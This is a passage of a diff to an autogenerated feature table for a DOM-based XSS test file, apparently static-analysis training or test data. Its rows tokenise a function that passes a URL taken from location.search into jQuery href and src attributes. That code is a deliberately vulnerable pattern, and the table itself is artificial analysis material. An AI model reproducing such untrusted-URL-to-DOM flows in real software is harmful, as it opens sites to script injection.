autogenerated/Xss/DomBasedXss/tst.js:481:3:481:74 | exceptional return of $("" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:481:5:481:11 | "" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:481:5:481:11 | "" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17963,6 +124059,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:481:14:481:56 | {src: [ ... n("/")} | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | | autogenerated/Xss/DomBasedXss/tst.js:481:14:481:56 | {src: [ ... n("/")} | enclosingFunctionName | urlStuff | | autogenerated/Xss/DomBasedXss/tst.js:481:14:481:56 | {src: [ ... n("/")} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:481:15:481:17 | src | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:481:15:481:17 | src | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:481:15:481:17 | src | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:481:15:481:17 | src | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:481:15:481:17 | src | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:481:15:481:55 | src: [" ... in("/") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:481:15:481:55 | src: [" ... in("/") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:481:15:481:55 | src: [" ... in("/") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:481:15:481:55 | src: [" ... in("/") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:481:15:481:55 | src: [" ... in("/") | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:481:15:481:55 | src: [" ... in("/") | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:481:15:481:55 | src: [" ... in("/") | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:481:15:481:55 | src: [" ... in("/") | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:481:15:481:55 | src: [" ... in("/") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:481:15:481:55 | src: [" ... in("/") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:481:20:481:45 | ["http: ... ", url] | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:481:20:481:45 | ["http: ... ", url] | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:481:20:481:45 | ["http: ... ", url] | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:481:20:481:45 | ["http: ... ", url] | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:481:20:481:45 | ["http: ... ", url] | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:481:20:481:50 | ["http: ... l].join | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:481:20:481:50 | ["http: ... l].join | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:481:20:481:50 | ["http: ... l].join | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:481:20:481:50 | ["http: ... l].join | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:481:20:481:50 | ["http: ... l].join | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:481:20:481:55 | ["http: ... in("/") | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:481:20:481:55 | ["http: ... in("/") | InputAccessPathFromCallee | 1.src | | autogenerated/Xss/DomBasedXss/tst.js:481:20:481:55 | ["http: ... in("/") | InputArgumentIndex | 1 | @@ -17972,6 +124093,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:481:20:481:55 | ["http: ... in("/") | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | | autogenerated/Xss/DomBasedXss/tst.js:481:20:481:55 | ["http: ... in("/") | enclosingFunctionName | urlStuff | | autogenerated/Xss/DomBasedXss/tst.js:481:20:481:55 | ["http: ... in("/") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:481:20:481:55 | exceptional return of ["http: ... in("/") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:481:20:481:55 | exceptional return of ["http: ... in("/") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:481:20:481:55 | exceptional return of ["http: ... in("/") | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:481:20:481:55 | exceptional return of ["http: ... in("/") | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:481:20:481:55 | exceptional return of ["http: ... in("/") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:481:21:481:39 | "http://google.com" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:481:21:481:39 | "http://google.com" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:481:21:481:39 | "http://google.com" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:481:21:481:39 | "http://google.com" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:481:21:481:39 | "http://google.com" | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:481:21:481:39 | "http://google.com" | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:481:21:481:39 | "http://google.com" | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:481:21:481:39 | "http://google.com" | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:481:21:481:39 | "http://google.com" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:481:21:481:39 | "http://google.com" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:481:42:481:44 | url | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:481:42:481:44 | url | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:481:42:481:44 | url | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:481:42:481:44 | url | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:481:42:481:44 | url | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:481:42:481:44 | url | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:481:42:481:44 | url | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:481:42:481:44 | url | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:481:42:481:44 | url | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:481:42:481:44 | url | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:481:47:481:50 | join | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:481:47:481:50 | join | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:481:47:481:50 | join | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:481:47:481:50 | join | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:481:47:481:50 | join | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:481:52:481:54 | "/" | CalleeFlexibleAccessPath | ?.join | | autogenerated/Xss/DomBasedXss/tst.js:481:52:481:54 | "/" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:481:52:481:54 | "/" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17979,6 +124130,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:481:52:481:54 | "/" | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | | autogenerated/Xss/DomBasedXss/tst.js:481:52:481:54 | "/" | enclosingFunctionName | urlStuff | | autogenerated/Xss/DomBasedXss/tst.js:481:52:481:54 | "/" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:481:59:481:66 | appendTo | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:481:59:481:66 | appendTo | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:481:59:481:66 | appendTo | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:481:59:481:66 | appendTo | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:481:59:481:66 | appendTo | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:481:68:481:73 | "body" | CalleeFlexibleAccessPath | $().appendTo | | autogenerated/Xss/DomBasedXss/tst.js:481:68:481:73 | "body" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:481:68:481:73 | "body" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17986,6 +124142,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:481:68:481:73 | "body" | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | | autogenerated/Xss/DomBasedXss/tst.js:481:68:481:73 | "body" | enclosingFunctionName | urlStuff | | autogenerated/Xss/DomBasedXss/tst.js:481:68:481:73 | "body" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:483:7:483:9 | url | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:483:7:483:9 | url | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:483:7:483:9 | url | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:483:7:483:9 | url | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:483:7:483:9 | url | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:483:7:483:20 | url.startsWith | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:483:7:483:20 | url.startsWith | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:483:7:483:20 | url.startsWith | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:483:7:483:20 | url.startsWith | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:483:7:483:20 | url.startsWith | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:483:7:483:32 | exceptional return of url.sta ... ps://") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:483:7:483:32 | exceptional return of url.sta ... ps://") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:483:7:483:32 | exceptional return of url.sta ... ps://") | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:483:7:483:32 | exceptional return of url.sta ... ps://") | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:483:7:483:32 | exceptional return of url.sta ... ps://") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:483:7:483:32 | url.sta ... ps://") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:483:7:483:32 | url.sta ... ps://") | contextSurroundingFunctionParameters | () | +| 